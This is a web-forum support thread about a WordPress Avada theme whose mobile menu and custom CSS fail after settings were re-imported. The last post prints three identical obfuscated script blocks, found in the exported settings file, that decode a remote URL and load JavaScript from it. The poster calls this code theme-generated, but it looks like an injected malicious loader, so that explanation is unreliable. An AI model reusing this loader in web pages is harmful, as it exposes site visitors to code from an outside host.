    Hi all,

    Very strange situation – I have selected to use the ‘classic’ mobile menu. Have configured all the style settings etc… but when I go to check the page on a small screen, it retains the standard menu size. It does not change to the smaller mobile menu with a hamburger.

    Site is here: http://www.plymouthmhn.org.

    I have disabled plugins, disabled cacheing, all the standard stuff that the internet has suggested. But it doesn’t change.

    Am I missing a basic ‘turn on mobile menu’ button somewhere?! It must be something very simple. But search as I may I can’t find anything like this.

    Many thanks in advance for those who help.

    Cheers,
    Chris.

    Hi @PlymouthMHN

    On a quick check the problem looks to be a JS error coming from a cookie consent plugin or snippet.

    Hi Michael,

    I had a look at that and deactivated the plugin but it did not change it.

    I’ve now deactivated it again. The menu still won’t work but no more issues in the javascript console…

    Any other ideas as to what it might be if it’s not a javascript conflict?

    Cheers for your help,
    Chris.

    Unfortunately I still see the JS error. That is unlikely to be the root problem here though, but without more information it’s not really possible to tell.

    I would suggest checking your custom CSS. In particular you may have invalid custom CSS in your Theme Options which breaks all CSS that follows it. If possible you can go to Theme Options, export and then copy the export code to https://gist.github.com/ That way your theme options can be checked.

    On closer inspection, nothing is working from my Custom CSS.

    For example, I have the following code:

    .fusion-footer-widget-area {

        border-top-width: 0px !important;

        border-top: 0px !important;

    }

    But the border still remains above the footer.

    I have recently performed a rebuild – this is a fresh install. I have imported my old settings and I have copied and pasted my CSS code in.

    Perhaps something has gone wrong in that process which is causing the menu and custom CSS codes to fail?

    Cheers,
    Chris.

    I fixed it.

    The issue was a lot bigger than I’d realised. Some Avada Theme settings (including CSS) were not working, including the menu. It turns out that the .json file that Avada which was generated from the old Avada site, generated a load of javascript at the beginning of the file:

    <script type="text/javascript">
    var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 97, 99); document.head.appendChild(po);
    </script>
    <script type="text/javascript">
    var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 97, 99); document.head.appendChild(po);
    </script>
    <script type="text/javascript">
    var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 97, 99); document.head.appendChild(po);
    </script>

    I simply deleted those entries, re-uploaded the .json and it’s all working.

    What I think is noteworthy in all this is that this code was generated in the first place, since it broke elements of the site.

    Hopefully this will be of help to others.

    Cheers,
    Chris.
